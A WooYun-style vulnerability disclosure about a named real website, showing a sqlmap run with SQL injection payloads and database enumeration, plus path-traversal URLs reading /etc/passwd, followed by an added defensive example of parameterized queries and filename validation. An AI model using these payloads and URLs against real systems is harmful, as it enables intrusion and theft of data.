WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2014-05-06: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly.
2014-06-20: The vendor has actively ignored the vulnerability; details are now disclosed to the public.

SQL injection and arbitrary file download vulnerabilities on the Zhongche Alliance (中车联盟) website

Issue 1: SQL injection in the searchword parameter
[root@Hacker~]# Sqlmap -u "http://www.aachina.net/search.php?search=search&searchword=4Cub3IhuFH6"
---
Place: GET
Parameter: searchword
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: search=search&searchword=4Cub3IhuFH6' AND (SELECT 7835 FROM(SELECT COUNT(*),CONCAT(0x3a6d666a3a,(SELECT (CASE WHEN (7835=7835) THEN 1 ELSE 0 END)),0x3a6b6d6f3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ugoP'='ugoP

    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: search=search&searchword=4Cub3IhuFH6' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6d666a3a,0x4f62526d7a6e696a6146,0x3a6b6d6f3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
---
[17:43:49] [INFO] testing MySQL
[17:43:49] [WARNING] reflective value(s) found and filtering out
[17:43:49] [INFO] confirming MySQL
[17:43:50] [INFO] the back-end DBMS is MySQL
[17:43:50] [INFO] fetching banner
[17:43:51] [INFO] actively fingerprinting MySQL
[17:43:51] [INFO] heuristics detected web page charset 'utf-8'
[17:43:52] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux CentOS
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
banner: '5.1.69'
[17:44:27] [INFO] fetching database users
database management system users [1]:
[*] 'aachina'@'localhost'
[17:44:28] [INFO] fetching database names
available databases [3]:
[*] db_aachina
[*] information_schema
[*] test
[17:55:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
[17:55:12] [INFO] fetching database names
[17:55:12] [INFO] fetching tables for databases: 'db_aachin, test'
[17:55:13] [WARNING] reflective value(s) found and filterin
Database: db_aachina
[24 tables]
+---------------------------------------+
| gwi_admin                             |
| gwi_adminlog                          |
| gwi_channel                           |
| gwi_comment                           |
| gwi_failedlogin                       |
| gwi_file                              |
| gwi_file_class                        |
| gwi_form                              |
| gwi_formdata                          |
| gwi_gbook                             |
| gwi_group                             |
| gwi_info                              |
| gwi_info_class                        |
| gwi_info_content                      |
| gwi_keyword                           |
| gwi_link                              |
| gwi_member                            |
| gwi_photo                             |
| gwi_photo_class                       |
| gwi_rel_comkey                        |
| gwi_rel_key                           |
| gwi_settings                          |
| gwi_styles                            |
| gwi_templates                         |
+---------------------------------------+
Issue 2: arbitrary file download
http://www.aachina.net/user.php?action=../../../../../../../../../../etc/passwd%00.jpg
http://www.aachina.net/user.php?action=../../../../../../../../../../etc/hosts%00.jpg

Verified.

Suggested fix: filter the parameters (validate the searchword and action inputs before they reach the database or the filesystem).

Vendor response: unable to contact the vendor, or the vendor actively refused.
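As an added illustration of what "filter the parameters" means for the two findings above (this is not code from the report or from the site; it is written against an in-memory SQLite table and assumes the search page and the download page are shaped like the two functions below), the block shows the unsafe string-spliced query next to its parameterized form, and a download-name check that refuses NUL bytes, path separators and non-allow-listed extensions. The table name gwi_info comes from the sqlmap listing; its rows, the allowed suffixes and the base directory are constructed for the example.

```python
"""Added example (not part of the original report): the two input checks
implied by the fix "filter the parameters"."""
import os
import sqlite3

# --- Issue 1: search.php?searchword=... -----------------------------------

def build_db() -> sqlite3.Connection:
    """Constructed sample rows standing in for the site's gwi_info table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gwi_info (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO gwi_info (title) VALUES (?)",
        [("rail vehicle parts",), ("alliance news",)],
    )
    return conn


def vulnerable_search(conn: sqlite3.Connection, searchword: str) -> list:
    """The pattern behind the finding: user input spliced into the SQL text.
    A single quote in the input changes the statement's structure; the
    resulting database error is exactly what the error-based technique in
    the sqlmap output keys on.  (Assumed shape of the original search.php.)"""
    sql = "SELECT id, title FROM gwi_info WHERE title LIKE '%" + searchword + "%'"
    return conn.execute(sql).fetchall()


def safe_search(conn: sqlite3.Connection, searchword: str) -> list:
    """Hardened form: the value is bound as a parameter, so quotes, comment
    markers and UNION keywords are only ever compared as text."""
    sql = "SELECT id, title FROM gwi_info WHERE title LIKE ?"
    return conn.execute(sql, ("%" + searchword + "%",)).fetchall()


# --- Issue 2: user.php?action=<file> --------------------------------------

ALLOWED_SUFFIXES = (".jpg", ".png", ".pdf")   # constructed allow-list


def resolve_download(action: str, base_dir: str):
    """Return the absolute path to serve, or None if the request is refused.
    Checks, in order: no NUL byte (the %00 in the report truncates the name
    at the C level so the appended '.jpg' is never seen), a bare filename
    with no separators, an allow-listed extension, and a resolved path that
    is still inside base_dir (realpath also follows symlinks)."""
    if "\x00" in action:
        return None
    if "/" in action or "\\" in action or action in ("", ".", ".."):
        return None
    if not action.lower().endswith(ALLOWED_SUFFIXES):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, action))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    db = build_db()
    print(safe_search(db, "vehicle"))
    print(safe_search(db, "4Cub3IhuFH6'"))          # quote treated as data
    print(resolve_download("../../etc/passwd\x00.jpg", "."))   # None
    print(resolve_download("logo.jpg", "."))
```

The decoded value of the report's second URL (`../../../../../../../../../../etc/passwd\x00.jpg`) fails the very first check; a version without the NUL byte fails the separator check, so neither reaches the filesystem. On the query side, the only behaviour the parameterized search has for the sqlmap probe string is "no rows", which is also the behaviour a detection engineer should expect from a patched endpoint.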